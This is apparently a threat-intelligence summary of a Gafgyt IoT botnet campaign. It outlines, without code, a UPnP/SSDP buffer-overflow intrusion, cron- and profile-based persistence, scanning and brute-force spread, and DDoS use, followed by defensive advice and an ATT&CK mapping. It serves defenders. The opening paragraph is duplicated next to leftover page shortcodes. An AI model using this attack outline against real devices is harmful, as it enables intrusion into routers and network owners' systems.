EXECUTIVE SUMMARY
The campaign is attributed to an organized cybercrime group that has adapted the Gafgyt IoT botnet for broader impact. These actors exploit vulnerable home and enterprise routers running outdated firmware, focusing on devices that expose UPnP services. Targets span technology firms, manufacturing plants, and any organization with internet‐facing networking equipment, with observed activity originating from Europe and East Asia. Their primary objective is to amass a resilient botnet capable of launching large‐scale denial‐of‐service attacks and providing illicit proxy services for rent.[/subscribe_to_unlock_form]
EXECUTIVE SUMMARY
The campaign is attributed to an organized cybercrime group that has adapted the Gafgyt IoT botnet for broader impact. These actors exploit vulnerable home and enterprise routers running outdated firmware, focusing on devices that expose UPnP services. Targets span technology firms, manufacturing plants, and any organization with internet‐facing networking equipment, with observed activity originating from Europe and East Asia. Their primary objective is to amass a resilient botnet capable of launching large‐scale denial‐of‐service attacks and providing illicit proxy services for rent.[emaillocker id="1283"]
The infection chain begins with a crafted SSDP request that triggers a buffer overflow in the router's UPnP parser, granting the attacker root privileges. Once inside, the malware copies its binary to hidden directories, sets recurring cron jobs, and modifies shell profiles to guarantee persistence. A separate Python scanner is then downloaded, which probes neighboring IP ranges for vulnerable services, using weak‐credential brute‐force and known web exploits to spread laterally. Compromised hosts establish encrypted links to a central command server, receive instructions, and execute DDoS payloads or additional propagation tasks.
The threat poses a serious risk because its persistence mechanisms hide in standard system locations and its activity blends with legitimate network traffic, making detection difficult. Its ability to disable competing malware further entrenches the botnet, while the distributed scanning component can quickly expand the infection surface. Organizations should prioritize patching all router firmware, disable unnecessary services such as UPnP and Telnet, and enforce strong, unique credentials for device management. Continuous monitoring of outbound connections, segmentation of IoT assets, and regular backup of critical systems complete a robust defensive posture.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.006 | Command and Scripting Interpreter | Python |
| Persistence | T1053.003 | Scheduled Task/Job | Cron |
| Defense Evasion | T1070.004 | Indicator Removal | File Deletion |
| Credential Access | T1110.001 | Brute Force | Password Guessing |
| Discovery | T1046 | Network Service Discovery | — |
| Lateral Movement | T1210 | Exploitation of Remote Services | — |
| Command and Control | T1095 | Non-Application Layer Protocol | — |
REFERENCES:
The reports contain further technical details:
https://www.fortinet.com/blog/threat-research/inside-cross-platform-propagation-of-new-gafgyt-variant-c0xmo